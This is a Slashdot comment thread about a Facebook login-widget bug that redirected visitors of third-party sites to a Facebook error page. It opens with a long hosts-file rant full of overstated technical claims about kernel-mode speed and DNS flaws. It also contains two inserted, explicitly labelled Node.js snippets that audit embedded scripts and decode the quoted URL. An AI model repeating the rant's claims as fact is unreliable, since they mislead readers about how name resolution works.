Plus, Adblock CAN'T DO AS MUCH & not from a single file solution that runs in Ring 0/RPL 0/kernelmode via tcpip.sys, a driver (since it's part of the IP stack & tightly integrated into it) which is far, Far, FAR FASTER than ring 3/rpl 3/usermode apps like browsers, & addons slow them down (known issue in FireFox).

To wit, 10++ things AdBlock can't do, hosts can:

---

1.) Blocking rogue DNS servers malware makers use

2.) Blocking known sites/servers that serve up malware... like known sites/servers/hosts-domains that serve up malicious scripts

3.) Speeding up your FAVORITE SITES that hosts can speed up via hardcoded line item entries properly resolved by a reverse DNS ping

4.) AdBlock works on Mozilla products (browser & email), hosts work on ANY webbound app AND are multiplatform.

5.) AdBlock can't protect external to FireFox email programs, hosts can (think OUTLOOK, Eudora, & others)

6.) AdBlock can't help you blow past DNSBL's (DNS block lists)

7.) AdBlock can't help you avoid DNS request logs (hosts can via hardcoded favorites)

8.) AdBlock can't protect you vs. TRACKERS (hosts can)

9.) AdBlock can't protect you vs. DOWNED or "DNS-poisoned" redirected DNS servers (hosts can by hardcodes)

10.) Hosts are EASIER to manage, they're just a text file (adblock means you had BEST know your javascript, perl, & python (iirc as to what languages are used to make it from source)).

& more... as a tiny 'sampling' & proofs thereof!

---

Same with Ghostery:

---

Evidon, which makes Ghostery, is an advertising company.

They were originally named Better Advertising, Inc., but changed their name for obvious PR reasons.

Despite the name change, let's be clear on one thing: their goal still is building better advertising, not protecting consumer privacy.

Evidon bought Ghostery, an independent privacy tool that had a good reputation.

They took a tool that was originally for watching the trackers online, something people saw as a legitimate privacy tool, and users were understandably concerned.

The company said they were just using Ghostery for research. Turns out they had relationships with a bunch of ad companies and were compiling data from which sites you visited when you were using Ghostery, what trackers were on those sites, what ads they were, etc., and building a database to monetize.

(AND, when confronted about it, they made their tracking opt-in and called it GhostRank, which is how it exists today.)

They took an open-source type tool, bought it, turned it from something that's actually protecting people from the ad industry, to something where the users are actually providing data to the advertisers to make it easier to track them. This is a fundamental conflict of interest.

To sum up:

Ghostery makes its money from selling supposedly de-identified user data about sites visited and ads encountered to marketers and advertisers. You get less privacy, they get more money.

That's an inverse relationship.

Better Advertising/Evidon continually plays up the story that people should just download Ghostery to help them hide from advertisers.

Their motivation to promote it, however, isn't for better privacy; it's because they hope that you'll opt in to GhostRank and send you a bunch of information.

They named their company Better Advertising for a reason: their incentive is better advertising, not better privacy.

---

Yes, so overall? Absolutely - hosts are superior!

Vs. even DNS servers too (which hosts files can supplement to overcome THEIR shortcomings, as follows):

---

A.) Running another program (sometimes in usermode no less, far, Far, FAR slower than kernelmode by many orders of magnitude & easily attacked) vs. the single hosts file (tightly integrated into the IP stack itself as part of it). ADDING COMPLEXITY & MORE "moving parts" room for error & breakdown!

B.) Wasting CPU cycles, RAM memory, & other forms of I/O to do what a single file can do

C.) Wasting ELECTRICITY (especially if the DNS server is setup as a separate machine) even if run as a service/daemon on a single system as user has

D.) DNS has NUMEROUS faults, & should anyone request a sampling of them? Ask & "ye shall receive"...

---

Thus, using custom hosts files results in BETTER security AND better efficiency, in saving your bandwidth, + electricity even (CPU cycles, RAM, + other forms of I/O as well) & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results (since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted, simply to overcome that 1/2 decade unpatched vs. Kaminsky bug worldwide on MOST DNS SERVERS still, in that flaw & yes, others!)

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

HOWEVER:

I don't "hate" DNS servers!

In fact - I use them myself (since I don't attempt to resolve 'every host-domain there is online' via hosts, only my favorites @ the top of the file, 20 of them, which beats hashtable indexing or b-tree binary seeks past 2++ million records no less).

I use specialized FILTERING DNS SERVERS that help block out malicious sites/servers/hosts-domains via DNSBLs:

---

Norton DNS:

http://setup.nortondns.com/ [nortondns.com]

198.153.192.1
198.153.194.1
198.153.192.60
198.153.194.60
198.153.192.50
198.153.194.50
198.153.192.40
198.153.194.40

OpenDNS:

http://www.opendns.com/home-solutions/ [opendns.com]

208.67.222.222
208.67.220.220

ScrubIT DNS:

http://scrubit.com/ [scrubit.com]

67.138.54.100
207.225.209.66

Comodo Secure DNS:

http://www.comodo.com/secure-dns/switch/windows_vista.html [comodo.com]

8.26.56.26
8.20.247.2

---

ALL in layered formation in both my network connection AND my Cisco/LinkSys stateful packet inspecting router.

(Again - for the concept of "layered-security"/"defense-in-depth": The best thing we have going currently vs. malicious threats online & otherwise...)

---

(Resulting in security AND in saving your bandwidth & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted), simply to overcome that flaw & others!

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

* :)

(Beat THAT with a stick... or better yet? With information that disproves my points (to any 'naysayers' or trolls, that is)).

The Advertiser isn't exactly "straight-up" with you either. Witness these events:

---

Adbanners slow you down & consume your bandwidth YOU pay for (40% of your avg. webpage no less):

ADBANNERS SLOW DOWN THE WEB: -> http://tech.slashdot.org/article.pl?sid=09/11/30/166218 [slashdot.org]

---

And people do NOT LIKE ads on the web:

PEOPLE DISLIKE ADBANNERS: http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

As well as this:

Users Know Advertisers Watch Them, and Hate It:

http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

Even WORSE still, is this:

Advertising Network Caught History Stealing:

http://yro.slashdot.org/story/11/07/22/156225/Advertising-Network-Caught-History-Stealing [slashdot.org]

---

Advertisers never intended to honor "DNT" (Do Not Track):

http://yro.slashdot.org/story/12/09/23/1334258/advertisers-never-intended-to-honor-dnt [slashdot.org]

---

AND, neither do others:

http://yro.slashdot.org/story/12/09/30/1435231/think-tanks-website-rejects-browser-do-not-track-requests [slashdot.org]

---

The webserver program folks even "jumped on the bandwagon" in Apache, as far as "DNT":

http://apache.slashdot.org/story/12/09/08/0053235/apache-patch-to-override-ie-10s-do-not-track-setting [slashdot.org]

---

Talk about "crooked" & telling 1/2 truths (as well as making software that was ONCE quite useful & effective, NOT QUITE AS USEFUL & EFFECTIVE by default anymore!)

Now - I truly KNOW this post will no doubt be downmodded, because Advertisers do NOT want this type of information getting out en-masse to enlighten users - they bought out Ghostery, crippled Adblock, but TRY THAT with a local hosts file (good luck!) especially one a user builds himself!

APK

P.S.=> Malware's present in the banner ads you click on as well, & here are some "examples thereof" over time:

---

THE NEXT AD YOU CLICK MAY BE A VIRUS:

http://it.slashdot.org/story/09/06/15/2056219/The-Next-Ad-You-Click-May-Be-a-Virus [slashdot.org]

---

Yahoo, Microsoft's Bing display toxic ads:

http://www.theregister.co.uk/2011/09/16/bing_yahoo_malware_ads/ [theregister.co.uk]

---

Malware torrent delivered over Google, Yahoo! ad services:

http://www.theregister.co.uk/2009/09/24/malware_ads_google_yahoo/ [theregister.co.uk]

---

Rogue ads infiltrate Expedia and Rhapsody:

http://www.theregister.co.uk/2008/01/30/excite_and_rhapsody_rogue_ads/ [theregister.co.uk]

---

Google sponsored links caught punting malware:

http://www.theregister.co.uk/2008/12/16/google_sponsored_links/ [theregister.co.uk]

---

DoubleClick caught supplying malware-tainted ads:

http://www.theregister.co.uk/2007/11/13/doubleclick_distributes_malware/ [theregister.co.uk]

---

Yahoo feeds Trojan-laced ads to MySpace and PhotoBucket users:

http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ [theregister.co.uk]

---

Real Media attacks real people via RealPlayer:

http://www.theregister.co.uk/2007/10/23/real_media_serves_malware/ [theregister.co.uk]

---

Attacks Targeting Classified Ad Sites Surge:

http://it.slashdot.org/story/11/02/02/1433210/Attacks-Targeting-Classified-Ad-Sites-Surge [slashdot.org]

---

Hackers Respond To Help Wanted Ads With Malware:

http://it.slashdot.org/story/11/01/20/0228258/Hackers-Respond-To-Help-Wanted-Ads-With-Malware [slashdot.org]

---

Ruskie gang hijacks Microsoft network to push penis pills:

http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/ [theregister.co.uk]

---

Major ISPs Injecting Ads, Vulnerabilities Into Web:

http://it.slashdot.org/story/08/04/19/2148215/major-isps-injecting-ads-vulnerabilities-into-web [slashdot.org]

---

Two Major Ad Networks Found Serving Malware:

http://tech.slashdot.org/story/10/12/13/0128249/Two-Major-Ad-Networks-Found-Serving-Malware [slashdot.org]

---

NY TIMES INFECTED WITH MALWARE ADBANNER:

http://news.slashdot.org/story/09/09/13/2346229/new-york-times-site-pop-up-says-your-computer-is-infected [slashdot.org]

---

MICROSOFT HIT BY MALWARES IN ADBANNERS:

http://apcmag.com/microsoft_apologises_for_serving_malware.htm [apcmag.com]

---

ADOBE FLASH ADS INJECTING MALWARE INTO THE NET:

http://it.slashdot.org/story/08/08/20/0029220/adobe-flash-ads-launching-clipboard-hijack-attacks [slashdot.org]

---

London Stock Exchange Web Site Serving Malware:

http://www.securityweek.com/london-stock-exchange-web-site-serving-malware [securityweek.com]

---

Spotify splattered with malware-tainted ads:

http://www.theregister.co.uk/2011/03/25/spotify_malvertisement_attack/ [theregister.co.uk]

---

Demonoid Down For a Week, Serving Malware Laden Ads:

http://yro.slashdot.org/story/12/08/02/1427257/demonoid-down-for-a-week-serving-malware-laden-ads [slashdot.org]

---

Google's DoubleClick spreads malicious ads (again):

http://www.theregister.co.uk/2009/02/24/doubleclick_distributes_malware/ [theregister.co.uk]

---

Ad networks owned by Google, Microsoft serve malware:

http://www.theregister.co.uk/2010/12/13/doubleclick_msn_malware_attacks/ [theregister.co.uk]

---

Hackers Use Banner Ads on Major Sites to Hijack Your PC:

http://www.wired.com/techbiz/media/news/2007/11/doubleclick [wired.com]

---

More dangerous to click on an online advertisement than an adult content site these days, Cisco said:

http://www.securityweek.com/easier-get-infected-malware-good-sites-shady-sites-cisco-says [securityweek.com]

---

As my list "multiple evidences thereof" as to adbanners & viruses + the fact they slow you down & cost you more (from reputable & reliable sources no less).

(Animats/John Nagle, a member here no less who himself contributed to the IP stack itself & I respect him immensely for it, unlike many here (especially trolls) said it best on advertisers & the web -> http://yro.slashdot.org/comments.pl?sid=3359149&cid=42482289 [slashdot.org] )

... apk

Shocking. (0)

Anonymous Coward | about a year and a half ago | (#42831377)

Anyone surprised?

Here Endeth The Lesson. (2)

fuzzyfuzzyfungus (1223518) | about a year and a half ago | (#42831391)

Not that it will; but let that be a lesson to you.

Re:Here Endeth The Lesson. (1)

RobertLTux (260313) | about a year and a half ago | (#42831717)

No NO NO you have to do it right

[play sound: THX Big Note.wav] THUS ENDETH THE LESSON

but anywho if i was one of those sites i would have my legal staff have a chat with Facebook about not having this happen again EVER.

Re:Here Endeth The Lesson. (1)

alostpacket (1972110) | about a year and a half ago | (#42833961)

Thanks teach! I have learned that people rarely learn the lesson. I think. Will this be on the final exam?

Um... How? (1)

camperdave (969942) | about a year and a half ago | (#42831397)

How is that possible? If I'm going to a site, I type in the URL into the address bar, or I click on a favorite, or click on a link returned by Google, or another search engine. The URL gets sent to a DNS server, which returns the IP address of the site, and then my browser starts making http requests directly from the site. Facebook is never involved. Unless Facebook has somehow poisoned the root DNS servers, I don't see how this is possible.

Re:Um... How? (3, Interesting)

belthize (990217) | about a year and a half ago | (#42831437)

I suspect horrible article is the main culprit. At a guess I suspect this is nothing more than Facebook's authentication service failing.

Client is directed to Facebook for authentication, mechanism fails, Facebook tosses up error page. The implication that Facebook did anything wrong other than having buggy authentication is likely way off base.

Full disclosure, don't have a facebook page, never visited a facebook page, have zero interest in facebook.

Re:Um... How? (2, Insightful)

Anonymous Coward | about a year and a half ago | (#42831539)

The key is "client is directed to Facebook". Sites include 3rd party scripts all the time, blindly executing whatever gets sent back. If that includes a simple assignment to window.location, there's your redirect.

Re:Um... How? (0)

Anonymous Coward | about a year and a half ago | (#42831461)

They must have dropped an erroneous document.location = facebook in their JS that all these sites include so you can "like" them

Re:Um... How? (3, Informative)

Culture20 (968837) | about a year and a half ago | (#42831479)

These sites are including javascript from facebook. Check your noscript/requestpolicy lists on those pages and you'll be surprised how many external sites those pages include javascript and images from. This was bound to happen (and worse things have probably happened in secret).
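An added example, not part of any post in this thread: a small Node.js inventory of the third-party scripts and frames a page embeds, showing which ones execute inside the page itself and which are pinned or sandboxed. The page URL, the markup and every host name are constructed placeholders, the function names are hypothetical, and the regex-based tag extraction is a simplification that is adequate for an audit sketch but is not a full HTML parser.

```javascript
// Constructed test data: all hosts are placeholders under the reserved .example TLD.
const SAMPLE_PAGE_URL = "https://news.example/front";
const SAMPLE_HTML = `
<html><head>
  <script src="/static/site.js"></script>
  <script src="https://widgets.social.example/sdk/all.js"></script>
  <script async src="//ads.adnet.example/show.js"></script>
  <script src="https://cdn.libs.example/lib.min.js"
          integrity="sha384-CONSTRUCTED-PLACEHOLDER" crossorigin="anonymous"></script>
  <script>var inline = 1;</script>
</head><body>
  <iframe src="https://widgets.social.example/like.html"></iframe>
  <iframe sandbox="allow-scripts" src="https://comments.example/embed"></iframe>
</body></html>`;

// Opening <script ...> and <iframe ...> tags (assumes no '>' inside attribute values).
const TAG_RE = /<(script|iframe)\b([^>]*)>/gi;
// name, name=value, name="value" or name='value'
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'<>]+)))?/g;

function parseAttributes(attrText) {
  const attrs = Object.create(null);
  for (const m of attrText.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    // The first occurrence of a duplicated attribute wins, as in browsers.
    if (!(name in attrs)) attrs[name] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

function inventoryThirdParty(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const found = [];
  for (const m of html.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const attrs = parseAttributes(m[2]);
    if (!attrs.src) continue; // inline script or empty frame: nothing is fetched
    let target;
    try {
      target = new URL(attrs.src, pageUrl); // resolves relative and //host forms
    } catch {
      continue; // unparseable src
    }
    if (target.origin === pageOrigin) continue; // first-party resource
    const tokens = (attrs.sandbox || "").toLowerCase().split(/\s+/).filter(Boolean);
    found.push({
      tag,
      origin: target.origin,
      url: target.href,
      // A <script src> runs with the embedding page's own privileges, so it
      // can assign window.location exactly as the page's own code can.
      runsInPage: tag === "script",
      // Subresource Integrity: the browser refuses a file whose hash differs.
      hasIntegrity: tag === "script" && Boolean(attrs.integrity),
      // A sandboxed frame cannot navigate the top-level page unless one of the
      // allow-top-navigation* tokens is granted (checked conservatively here).
      sandboxBlocksTopNav:
        tag === "iframe" &&
        "sandbox" in attrs &&
        !tokens.some((t) => t.startsWith("allow-top-navigation")),
    });
  }
  return found;
}

// Origins whose code runs in the page and can change without the site noticing.
function unpinnedInPageOrigins(entries) {
  const origins = entries
    .filter((e) => e.runsInPage && !e.hasIntegrity)
    .map((e) => e.origin);
  return [...new Set(origins)].sort();
}

const entries = inventoryThirdParty(SAMPLE_HTML, SAMPLE_PAGE_URL);
for (const e of entries) {
  console.log(e.tag, e.origin, {
    runsInPage: e.runsInPage,
    hasIntegrity: e.hasIntegrity,
    sandboxBlocksTopNav: e.sandboxBlocksTopNav,
  });
}
console.log("unpinned in-page origins:", unpinnedInPageOrigins(entries));
```
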

Re:Um... How? (4, Interesting)

Anonymous Coward | about a year and a half ago | (#42831579)

The Steam browser is a nice example of facebook javascript gone wrong. Every page with a "like" script on it redirects to some facebook address as soon as the page finishes loading. The end result is that you see what you wanted to see, but the URL bar is always some sort of lengthy facebook redirect because Steam is trying to load it somehow but fails and leaves you on the page you wanted to visit anyway.

Re:Um... How? (4, Insightful)

Anonymous Coward | about a year and a half ago | (#42831487)

In short, "Web bugs", short bits of code that are included inline from another provider. Basically these sites had on their front page a "get shit from facebook" or some such badge displayed, that badge is not created by the site owner but is sourced inline from facebook, now if the thing they pull from facebook is broken and facebook presents a redirect to your browser in place of the web bug (badge, whatever) then your browser dutifully redirects.

If facebook were malicious they could commandeer half of the web.

Re:Um... How? (1)

omnichad (1198475) | about a year and a half ago | (#42831927)

I successfully made it to Papa John's web site to order pizza last night. When I got to the last page of checkout, I immediately got redirected to Facebook.

Apparently they're including Facebook Javascript code on all their pages, and I happened to be in the middle of ordering a pizza when the bug hit.

Why Javascript is allowed to redirect a web site these days without user intervention is beyond me. Most Javascript methods that open windows or navigate you require being triggered by a click event or other human intervention.

facebook (4, Funny)

hackula (2596247) | about a year and a half ago | (#42831399)

The first successful test. Soon every site will redirect to facebook, then... the world!

Re:facebook (1)

Impy the Impiuos Imp (442658) | about a year and a half ago | (#42831631)

1. Offer multibillion IPO
2. Seize control of internet
3. ???
4. Well, monetizing for profit is still problematic

Re:facebook (1)

omnichad (1198475) | about a year and a half ago | (#42831931)

The ultimate phishing attack.

Details: Logging in from 3rd party sites? (1)

Anonymous Coward | about a year and a half ago | (#42831423)

I was logged into Facebook when I got this redirect.

However, the website I got it from is one I have never placed a Facebook "like" on or written a comment on with my profile.

Does "a bug that redirected people logging in with Facebook from third party sites" mean that the site has my Facebook details?

The URL was this:

https://www.facebook.com/dialog/permissions.request?client_id=__15digitno__&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.website.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D18%23cb%3Df28691eaa8%26origin%3Dhttp%253A%252F%252Fwww.website.com%252Ff1c830d484%26domain%3Dwww.website.com%26relation%3Dparent&sdk=joey

Re:Details: Logging in from 3rd party sites? (5, Informative)

SJHillman (1966756) | about a year and a half ago | (#42831537)

The third-party sites load a chunk of Facebook onto their site, so if you're logged into Facebook then you're logged into that chunk on the third-party site. The third-party site doesn't have your login or information - it's passed between you and the chunk of Facebook on that site. Or at least, that's how it's supposed to work.

It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.
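An added example, not part of any post in this thread: the URL quoted in the question above, decoded layer by layer in Node.js to show which hosts and parameters the redirect actually carried. The URL string is copied from the post with the poster's own redactions; the function names are hypothetical, and the "same site" test compares only the last two host labels, which is a simplification that ignores the public-suffix list.

```javascript
// URL exactly as quoted in the thread; "__15digitno__" and "www.website.com"
// are the poster's own redactions, not real values.
const QUOTED_URL =
  "https://www.facebook.com/dialog/permissions.request?client_id=__15digitno__&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.website.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D18%23cb%3Df28691eaa8%26origin%3Dhttp%253A%252F%252Fwww.website.com%252Ff1c830d484%26domain%3Dwww.website.com%26relation%3Dparent&sdk=joey";

function paramsToObject(params) {
  const out = {};
  for (const [key, value] of params) out[key] = value;
  return out;
}

function decodeLoginDialogUrl(raw) {
  // Layer 1: the dialog request itself.
  const outer = new URL(raw);
  const q = outer.searchParams;

  // Layer 2: redirect_uri is a complete URL, percent-encoded once.
  const redirectRaw = q.get("redirect_uri");
  if (!redirectRaw) throw new Error("no redirect_uri parameter");
  const redirect = new URL(redirectRaw);

  // Layer 3: the redirect's fragment is itself a query string, and its
  // "origin" value was encoded a second time (%253A in the outer URL).
  const fragment = paramsToObject(new URLSearchParams(redirect.hash.slice(1)));

  return {
    endpoint: outer.origin + outer.pathname,
    clientId: q.get("client_id"),
    responseTypes: (q.get("response_type") || "").split(",").filter(Boolean),
    display: q.get("display"),
    embeddingDomain: q.get("domain"),
    redirect: {
      scheme: redirect.protocol.replace(":", ""),
      host: redirect.hostname,
      path: redirect.pathname,
      query: paramsToObject(redirect.searchParams),
      fragment,
    },
  };
}

// Naive "same site" key: last two labels of the host name (assumption).
function siteOf(host) {
  return host.split(".").slice(-2).join(".");
}

function summarize(decoded) {
  const dialogHost = new URL(decoded.endpoint).hostname;
  return {
    // The request sets display=none.
    displayIsNone: decoded.display === "none",
    // The redirect target is on the login provider's own site, not on the
    // third-party site the visitor was reading.
    redirectStaysOnProvider: siteOf(dialogHost) === siteOf(decoded.redirect.host),
    redirectIsPlainHttp: decoded.redirect.scheme === "http",
    // The embedding site appears only as a parameter inside the fragment.
    embedderNamedInFragment:
      decoded.redirect.fragment.domain === decoded.embeddingDomain,
  };
}

const decoded = decodeLoginDialogUrl(QUOTED_URL);
console.log(JSON.stringify(decoded, null, 2));
console.log(summarize(decoded));
```
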

Re:Details: Logging in from 3rd party sites? (1)

Mitreya (579078) | about a year and a half ago | (#42832493)

> It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

Yes, but do we have to?
Most of those websites look crippled until the last of these dozen services finally loads 3 minutes later. Blockbuster.com used to hang (unresponsive) for about 30 seconds while the browser said "contacting adserve...fb.com".

Re:Details: Logging in from 3rd party sites? (1)

CanHasDIY (1672858) | about a year and a half ago | (#42832745)

> It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

For some reason, that makes me a sad panda... :(

Re:Details: Logging in from 3rd party sites? (1)

Anonymous Coward | about a year and a half ago | (#42831585)

You don't need to like or comment. You have been logged automatically (as in: they know where you've been). It's a feature!

Re:Details: Logging in from 3rd party sites? (1)

alostpacket (1972110) | about a year and a half ago | (#42834019)

sdk=joey?

function getJoey()
{
        return "Doh";
}

Single point of failure (2, Interesting)

Anonymous Coward | about a year and a half ago | (#42831435)

Recently we have seen very widespread "single point of failure" issues. Notably with Facebook and Apple who are both so pervasive in society. These firms are constantly doing major and complicated software updates and those updates are propagated either invisibly in the background or introduced through "voluntary" software updates where you don't get major new features unless you do the update and you have to simply live with whatever bugs or feature cripples come along with it.

The fact so many people are dependent on these very small number of very human folks is a large "single point of failure" risk for society and its individual, business, and government segments.

JJ

Re:Single point of failure (0)

Anonymous Coward | about a year and a half ago | (#42831501)

What was the apple one? I don't recollect it

Re:Single point of failure (1)

FireFury03 (653718) | about a year and a half ago | (#42831821)

> What was the apple one? I don't recollect it

The only one I can remember was when the server that responds to WISPr probes went down, rendering everyone's ipad unable to connect to a network...

Background:
When an iOS device associates with a wifi network, it makes a web request to apple's server to see if it's behind a captive portal. It expects to get back "SUCCESS" (returned by Apple's server) or a captive portal login page (returned by the wifi hotspot). If it doesn't get "SUCCESS" it displays the captive portal page so the user can log in. Unfortunately, Apple's software is unable to cope with the web request not being answered at all, and you end up with a blank "login" page and a non-functional network connection. Yes, this is the usual quality I've come to expect from Apple, given the numerous problems I've had to deal with since iOS devices started to get popular in the workplace...

Re:Single point of failure (1)

SuricouRaven (1897204) | about a year and a half ago | (#42833095)

Windows does the same thing, but AFAIK the only thing that happens if it doesn't get the OK response is the user gets a little popup balloon from the system tray warning them an internet connection is not available.

Re:Single point of failure (3, Informative)

SJHillman (1966756) | about a year and a half ago | (#42831581)

I use Facebook, I admit it. However, I only use Facebook for Facebook. If I log in to another site, I don't use the "Connect with Facebook" option to log in. If the site only allows you to log in with Facebook, I leave. I've yet to find a mission critical site like banks, etc that use Facebook or another service. Therefore, I'm doing my part to save humanity from the single point of failure.

Re:Single point of failure (1)

alostpacket (1972110) | about a year and a half ago | (#42834077)

Unfortunately it sounds like this bug would have hit users such as yourself also. I think when leaving FB to visit another site it is best to log out.

Multi-instance/multi-profile browsers would also be something nice. Especially those that limit what they report about the machine they are on (less fingerprint via installed fonts/cookies/html5 dbs/flash objects/etc)

Re:Single point of failure (0)

Anonymous Coward | about a year and a half ago | (#42831985)

It's worse than a single point of failure. I remember when twitter broke on a site and would redirect me to the twitter error page if I didn't hit escape fast enough as a page loaded.

This is multiple parallel points of complete failure.

I keep trying to use Facebook. (5, Insightful)

hessian (467078) | about a year and a half ago | (#42831477)

I've come to the conclusion that social networking is screwed up because the people who use it most are the people who are least invested in reality.

Every time I try to use Facebook, I get driven away by the behavior of its users. Not the Instagram dinner plate updates, or the personal drama, because I've already filtered out those people.

It's the sensitivity. People take anything seriously. I posted an article showing that divorce really screws up kids. I got back a half-dozen replies, all from people who'd had divorces, defending their own decisions. When I said that it wasn't personal, they said they still felt attacked.

There were other instances of similar behavior too. People hover around Facebook, looking for some reason to cause a scene. Why was this, I wondered.

It seems to me that if you have found something worth doing in life, you're mostly doing it. That doesn't mean your job. If your job sucks, you've probably got a project on the side. You're not going to devote your time to screwing around, which is what most people on Facebook do.

This means that social networking including Facebook selects out the people who have any direction in life, and leaves the resentful, bored, unemployed, disabled, upset, insane, teenage, etc. and concentrates them in large numbers. This is why so much of the response is crazy.

I should amend the post title. I used to keep trying to use Facebook (and MySpace, Digg, Reddit, Friendster, Pinterest, etc.). But now, I don't. These aren't places where healthy people hang out.

Re:I keep trying to use Facebook. (1)

hodet (620484) | about a year and a half ago | (#42831611)

Facebook free for three months now. I just came to the realization that I was not interacting with all the people I care about in my life on Facebook. I was interacting with them in real life. The only interaction was with "fringe" friends or people you felt obligated to friend because they are "friends of friends" you met somewhere. "Hey great, Joe's wife took a picture of her Big Mac and fries and is enjoying a delicious shake." Ya, I'm outta here.

Re:I keep trying to use Facebook. (1)

Megane (129182) | about a year and a half ago | (#42831625)

Really, the only two-way stuff I use is:

Slashdot, because of the good moderation system and good supply of topics that I want to see other people's comments about as much as the topic itself

and 4chan (yes, seriously) because it's sort of a zero-point energy of random discussion with its default anonymity and constantly expiring threads (it's too much hardcore internet trolling and memes for the average person though) But stay away from /b/, nothing interesting happens there anymore.

I avoid the twits and bookfaces as much as possible. At least 4chan's social cancer is constantly flushed away, unlike twitter and facebook where it stays around and festers.

Re:I keep trying to use Facebook. (1)

rmdingler (1955220) | about a year and a half ago | (#42831715)

Well done. I would add unhappy to your list of qualities that make up the bulk of social site users. Many of the people I know who are regular users remain in contact with old flames even though they are now like Al Bundy. Here's to hoping these extra opportunities to procreate don't result in the psychologically healthy being out-bred by this genotypical subset. Oh wait...

Re:I keep trying to use Facebook. (0)

Anonymous Coward | about a year and a half ago | (#42831803)

I feel personally attacked by your attack of people feeling attacked by your attacking them.

Re:I keep trying to use Facebook. (1, Insightful)

roman_mir (125474) | about a year and a half ago | (#42833743)

> I should amend the post title. I used to keep trying to use Facebook (and MySpace, Digg, Reddit, Friendster, Pinterest, etc.). But now, I don't. These aren't places where healthy people hang out.

- yeah, but here, on /., we are the paragon, the shining beacon, the city on the hill, the perfect example of the healthy, both in the mind and in the body. /. - if you feel you are healthy.

Story Subject Fail (4, Informative)

OzPeter (195038) | about a year and a half ago | (#42831485)

Facebook did not "Break major websites". Instead Facebook users who were logged in to Facebook (and hence working under the auspices of Facebook) were screwed over when they went to third party sites. Sheesh .. even TFS explains that.

Are we now starting to refer to the Internet as teh Facebook???

Re:Story Subject Fail (1)

SJHillman (1966756) | about a year and a half ago | (#42831629)

It broke the expected functionality of third-party websites. But I agree that Internet is not Facebook. At most, you might be able to claim Facebook broke a chunk of the WWW, but certainly not the Internet as only websites were affected. It's like saying a minor design flaw in a part used by many different car manufacturers completely disrupted our entire transportation infrastructure.

Re:Story Subject Fail (1)

Sockatume (732728) | about a year and a half ago | (#42832249)

You seem to be under the impression that it was people visiting sites from links on Facebook that had an issue. If you visited any of the sites, directly, while logged into Facebook you were affected.

Re:Story Subject Fail (1)

John Hasler (414242) | about a year and a half ago | (#42832861)

> If you visited any of the sites, directly, while logged into
> Facebook you were affected.

And therefore it affected only Facebook users. Neither the Web nor the Net was broken. Just Facebook.

Re:Story Subject Fail (2)

Bogtha (906264) | about a year and a half ago | (#42832473)

> Instead Facebook users who were logged in to Facebook (and hence working under the auspices of Facebook)

I think you've misunderstood. By "logged into Facebook", they don't mean they were actually looking at Facebook at the time. It means they had previously logged into Facebook at some point and their browser has a cookie saved which authenticates them to Facebook.

These people were surfing the web normally. They weren't on Facebook. They got to a site that used Facebook for authentication, and the JavaScript that these sites embedded to enable that had a defect in it that noticed they were logged into Facebook and caused the error.

From the end user's perspective, it was simply a case of surfing as normal, and then suddenly a Facebook error message hijacked the website they were trying to visit.

Re:Story Subject Fail (1)

CanHasDIY (1672858) | about a year and a half ago | (#42832789)

> Facebook did not "Break major websites".

This.

Facebook broke Facebook, and some third party sites were affected.

Re:Story Subject Fail (1)

John Hasler (414242) | about a year and a half ago | (#42832813)

> Are we now starting to refer to the Internet as teh
> Facebook???

Well, you're already confounding the Web and the Net.

If it was anyone else... (1)

dywolf (2673597) | about a year and a half ago | (#42831503)

I'd be of the mind that it wasn't a bug, but intentional. But FB? They don't really need the page views....do they? Stock has taken a bit of a dip again since the graph thing came to light...though still high enough that I'm sitting pretty (bought when it was around 19.50 or so).

Annoying! (1)

SirAudioMan (2836381) | about a year and a half ago | (#42831563)

At first I thought I somehow angered facebook and caused my session to get corrupted! Each time I visited a few different news sites, after a few seconds it would be redirected to the error page. I ended up having to clear my cache to prevent the annoying redirect. I find facebook is good as a time waster but I find it scary how many sites have access to my logins and can track and control content.

Too big to fail (1)

Anonymous Coward | about a year and a half ago | (#42831771)

Obviously Facebook is too big to fail, so every time they bork the internet we should give them a billion dollars.

Re:Too big to fail (1)

leuk_he (194174) | about a year and a half ago | (#42833379)

No internet company should be too big to fail. .... But we give them billions anyway. Google in advertising, Facebook as "like" people, Microsoft for your desktop OS. Apple because it is shiny.

clear skies fuck you up (1)

